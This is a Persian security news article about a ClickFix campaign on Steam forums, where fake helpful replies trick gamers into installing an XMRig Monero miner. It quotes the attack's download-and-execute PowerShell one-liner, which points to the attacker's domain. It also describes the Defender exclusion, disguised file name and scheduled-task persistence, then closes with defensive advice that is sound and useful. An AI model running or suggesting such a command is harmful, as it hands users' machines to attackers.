کد خبر: ۷۰۶

حمله ClickFix به فروم‌های استیم؛ گیمرها چگونه قربانی استخراج رمزارز می‌شوند؟

حمله ClickFix به فروم‌های استیم؛ گیمرها چگونه قربانی استخراج رمزارز می‌شوند؟

حمله ClickFix به فروم‌های Steam گیمرها را هدف گرفته است. مهاجمان با دستور PowerShell، ماینر XMRig را نصب کرده و از سیستم قربانی برای استخراج Monero استفاده می‌کنند.

حملات ClickFix این بار فروم‌های استیم را هدف قرار داده‌اند. مهاجمان با انتشار پاسخ‌هایی که ظاهراً حاوی راه‌حل مشکلات فنی بازی‌ها هستند، کاربران را فریب می‌دهند تا یک دستور مخرب PowerShell را اجرا کنند؛ دستوری که در نهایت می‌تواند یک ماینر رمزارز را روی کامپیوتر قربانی نصب کند.

در سال ۲۰۲۶ شاهد افزایش قابل‌توجه حملات ClickFix بوده‌ایم. مجرمان سایبری مرتباً روش‌های جدیدی برای سوءاستفاده از این تکنیک پیدا می‌کنند و حالا گیمرها نیز به یکی از اهداف اصلی آن تبدیل شده‌اند.

بر اساس گزارش‌های منتشرشده، مهاجمان در فروم‌های Steam خود را به‌عنوان کاربران باتجربه معرفی کرده و برای مشکلاتی مانند کرش کردن بازی، ناپدید شدن آیتم‌های داخل بازی یا سایر خطاهای فنی، راهکارهایی ظاهراً مفید ارائه می‌کنند.

مشکل زمانی آغاز می‌شود که کاربر به این توصیه‌ها اعتماد کرده و دستور پیشنهادی را در PowerShell با دسترسی Administrator اجرا می‌کند.

ClickFix چیست و چرا به فروم‌های Steam رسیده است؟

بسیاری از گیمرها برای حل مشکلات بازی‌های خود به انجمن‌های استیم مراجعه می‌کنند. از پیدا کردن راه‌حل یک باگ گرفته تا رفع مشکلات اجرای بازی، کاربران معمولاً به تجربه و پیشنهادهای سایر بازیکنان اعتماد دارند.

مهاجمان دقیقاً از همین اعتماد سوءاستفاده می‌کنند.

در این روش، فرد مهاجم در پاسخ به پرسش یک کاربر، خود را مانند یک کاربر عادی و کمک‌رسان نشان می‌دهد. سپس پیشنهاد می‌کند برای برطرف کردن مشکل، PowerShell را به‌صورت Administrator اجرا کرده و یک دستور مشخص را در آن وارد کنید.

این دستور ممکن است ظاهری کاملاً فنی و بی‌خطر داشته باشد، اما در واقع می‌تواند یک اسکریپت مخرب را از سرور مهاجم دانلود و اجرا کند.

نکته خطرناک اینجاست که حمله فقط کاربری را که سؤال را مطرح کرده تهدید نمی‌کند. کاربران دیگری که با جست‌وجوی گوگل به همان صفحه فروم می‌رسند نیز ممکن است همان دستور را اجرا کرده و قربانی شوند.

ClickFix چگونه قربانی را فریب می‌دهد؟

ClickFix بر پایه مهندسی اجتماعی عمل می‌کند. در این حملات، مهاجم الزاماً سیستم قربانی را مستقیماً هک نمی‌کند؛ بلکه کاری می‌کند که خود کاربر، ناخواسته مراحل لازم برای آلوده شدن دستگاه را انجام دهد.

این تکنیک پیش‌تر در قالب‌هایی مانند موارد زیر نیز دیده شده است:

  • CAPTCHAهای جعلی
  • خطاهای جعلی مرورگر
  • پیام‌های هشدار ساختگی
  • راهکارهای تقلبی برای رفع خطاهای نرم‌افزاری
  • دستورهای جعلی برای اجرای PowerShell یا Terminal

وجه مشترک همه این روش‌ها این است که کاربر را متقاعد می‌کنند یک دستور مخرب را خودش اجرا کند.

دستور مخرب PowerShell چه کاری انجام می‌دهد؟

یکی از دستورهایی که در این حملات مشاهده شده، به شکل زیر است:

irm msfconfig.icu | iex

این دستور ممکن است برای کاربری که با PowerShell آشنایی ندارد، شبیه یک فرمان ساده مرتبط با تنظیمات ویندوز به نظر برسد؛ اما عملکرد واقعی آن بسیار خطرناک‌تر است.

برای درک بهتر، می‌توان دستور را به دو بخش اصلی تقسیم کرد:

۱. irm چیست؟

irm مخفف Invoke-RestMethod است؛ یکی از دستورات داخلی PowerShell که می‌تواند به یک آدرس اینترنتی متصل شده و داده‌ای را از آن دریافت کند.

در این حمله، آدرس اینترنتی مشخص‌شده متعلق به زیرساخت مهاجم است و می‌تواند یک اسکریپت PowerShell مخرب را در پاسخ ارسال کند.

۲. iex چیست؟

iex مخفف Invoke-Expression است. این دستور محتوایی را که دریافت کرده، به‌عنوان کد PowerShell اجرا می‌کند.

بنابراین ترکیب این دو دستور باعث می‌شود سیستم ابتدا محتوای ارسال‌شده از سرور مهاجم را دریافت و سپس همان کد را بلافاصله اجرا کند.

آیا می‌توان محتوای دستور را بدون اجرای آن بررسی کرد؟

از نظر فنی، حذف بخش iex باعث می‌شود محتوای دریافت‌شده به‌جای اجرا شدن، در PowerShell نمایش داده شود.

به همین دلیل، اجرای کورکورانه دستورهایی که در فروم‌ها، شبکه‌های اجتماعی، چت‌ها یا بخش نظرات از سوی افراد ناشناس پیشنهاد می‌شوند، بسیار خطرناک است.

قاعده ساده این است: اگر دقیقاً نمی‌دانید یک دستور PowerShell چه کاری انجام می‌دهد، آن را اجرا نکنید.

مهاجمان در نهایت چه چیزی روی کامپیوتر نصب می‌کنند؟

در این کمپین، هدف نهایی مهاجمان نصب یک ماینر رمزارز XMRig است.

اسکریپت PowerShell طوری طراحی شده که شبیه یک ابزار بهینه‌سازی ویندوز عمل کند. پس از اجرا، پیام‌هایی به کاربر نمایش داده می‌شود که ظاهراً نشان می‌دهند سیستم در حال انجام عملیات مختلفی است؛ برای مثال:

  • پاک‌سازی فایل‌های موقت
  • پاک‌سازی کش DNS
  • به‌روزرسانی درایورها
  • بررسی خطاهای دیسک
  • غیرفعال کردن برنامه‌های غیرضروری هنگام Startup
  • اسکن سیستم برای شناسایی بدافزار
  • تعمیر Windows Image
  • بررسی یکپارچگی فایل‌های سیستمی

اما این فعالیت‌ها عمدتاً برای منحرف کردن توجه کاربر طراحی شده‌اند.

در پس‌زمینه، مراحل اصلی حمله در حال اجرا هستند.

XMRig چیست؟

XMRig یک ابزار متن‌باز و قانونی برای استخراج رمزارز است و به‌خودی‌خود بدافزار محسوب نمی‌شود.

مشکل زمانی ایجاد می‌شود که مهاجمان بدون اطلاع یا رضایت کاربر، این نرم‌افزار را روی سیستم او نصب و اجرا کنند.

در این حمله، اسکریپت مخرب ابتدا بررسی می‌کند که آیا با دسترسی Administrator اجرا شده است یا خیر. در صورت داشتن این سطح دسترسی، یک پوشه مخفی با مسیر زیر ایجاد می‌شود:

C:\Windows\Background

سپس این پوشه به فهرست استثناهای Microsoft Defender اضافه می‌شود. در نتیجه، فایل‌هایی که در آن قرار می‌گیرند ممکن است توسط آنتی‌ویروس داخلی ویندوز اسکن نشوند.

در مرحله بعد، فایل اجرایی XMRig دانلود شده و در همان پوشه با نامی ظاهراً قانونی مانند system.exe ذخیره می‌شود.

چرا گیمرها هدف جذابی برای ماینرهای رمزارز هستند؟

کامپیوترهای گیمینگ مدرن معمولاً از CPU و GPU قدرتمند برخوردارند؛ سخت‌افزاری که توان پردازشی بالایی دارد و می‌تواند برای استخراج رمزارز مورد سوءاستفاده قرار بگیرد.

پس از اجرای XMRig، منابع پردازشی سیستم قربانی برای استخراج رمزارز Monero استفاده می‌شود و درآمد حاصل از استخراج به مهاجمان می‌رسد.

این اتفاق می‌تواند پیامدهای مختلفی برای کاربر داشته باشد، از جمله:

  • کاهش شدید عملکرد کامپیوتر
  • افت FPS در بازی‌ها
  • افزایش مصرف برق
  • افزایش دمای CPU و GPU
  • فشار بیشتر روی قطعات سخت‌افزاری
  • کاهش عمر مفید برخی قطعات
  • افزایش مصرف منابع سیستم در پس‌زمینه

ماینر چگونه بعد از ری‌استارت سیستم فعال می‌ماند؟

مهاجمان برای اینکه XMRig پس از خاموش و روشن شدن کامپیوتر نیز اجرا شود، یک وظیفه جدید در Windows Task Scheduler ایجاد می‌کنند.

نام این وظیفه چیزی شبیه موارد زیر است:

XMRig-{computer name}

به این ترتیب، ماینر می‌تواند با هر بار راه‌اندازی ویندوز به‌صورت خودکار اجرا شود.

چگونه از حملات ClickFix و ماینرهای رمزارز جلوگیری کنیم؟

مهم‌ترین راه مقابله با این حملات، اعتماد نکردن به دستورهای ناشناس است.

برای محافظت از کامپیوتر گیمینگ خود، نکات زیر را جدی بگیرید:

۱. دستورهای ناشناس PowerShell را اجرا نکنید

اگر فردی در فروم، چت، شبکه اجتماعی یا بخش نظرات از شما خواست دستوری را در PowerShell، Windows Terminal یا Command Prompt کپی و اجرا کنید، قبل از هر کاری درباره آن تحقیق کنید.

۲. قبل از زدن Enter، عملکرد دستور را بررسی کنید

به‌خصوص اگر دستور شامل عباراتی مانند irm، iex یا دانلود و اجرای مستقیم فایل از اینترنت است، با احتیاط بسیار بیشتری عمل کنید.

صرف اینکه یک کاربر در فروم استیم ادعا می‌کند این دستور مشکل بازی شما را برطرف می‌کند، به معنی امن بودن آن نیست.

۳. آنتی‌ویروس را فقط به خاطر اجرای بازی غیرفعال نکنید

یکی از باورهای رایج میان گیمرها این است که آنتی‌ویروس باعث افت محسوس عملکرد بازی می‌شود. در حالی که راهکارهای امنیتی مدرن، به‌خصوص در حالت Gaming Mode، برای کاهش مزاحمت هنگام بازی طراحی شده‌اند.

غیرفعال کردن آنتی‌ویروس برای چند FPS بیشتر می‌تواند در مقابل یک بدافزار یا ماینر رمزارز، هزینه بسیار بیشتری داشته باشد.

۴. از یک راهکار امنیتی معتبر استفاده کنید

یک نرم‌افزار امنیتی مناسب می‌تواند تلاش برای دانلود یا اجرای فایل‌های مشکوک را شناسایی و مسدود کند.

اگر از کامپیوتر گیمینگ استفاده می‌کنید، بهتر است راهکاری را انتخاب کنید که Gaming Mode داشته باشد تا هنگام اجرای بازی، اعلان‌های غیرضروری و فعالیت‌های مزاحم کاهش پیدا کنند، بدون اینکه لایه‌های اصلی امنیتی کامپیوتر خاموش شوند.

جمع‌بندی

حمله ClickFix به فروم‌های Steam نمونه دیگری از این واقعیت است که مهندسی اجتماعی همچنان یکی از ابزارهای مؤثر مجرمان سایبری محسوب می‌شود.

مهاجمان در این روش به‌جای اینکه مستقیماً سیستم گیمر را هک کنند، از اعتماد او به سایر کاربران سوءاستفاده کرده و یک دستور PowerShell را به‌عنوان راهکار رفع مشکل بازی معرفی می‌کنند.

اجرای این دستور می‌تواند به دانلود و اجرای اسکریپت مخرب و در نهایت نصب XMRig منجر شود؛ نرم‌افزاری که منابع سخت‌افزاری کامپیوتر را برای استخراج رمزارز Monero در اختیار مهاجمان قرار می‌دهد.

بنابراین اگر در فروم‌های استیم یا هر انجمن آنلاین دیگری با کاربری مواجه شدید که برای رفع مشکل بازی از شما می‌خواهد یک دستور PowerShell را با دسترسی Administrator اجرا کنید، قبل از هر اقدامی درباره آن دستور تحقیق کنید و هرگز کد ناشناس را کورکورانه اجرا نکنید.

گزارش خطا
ارسال پیام
captcha
پیشنهاد سردبیر بیشتر
آخرین اخبار
پربازدید
خانه پربازدید پربحث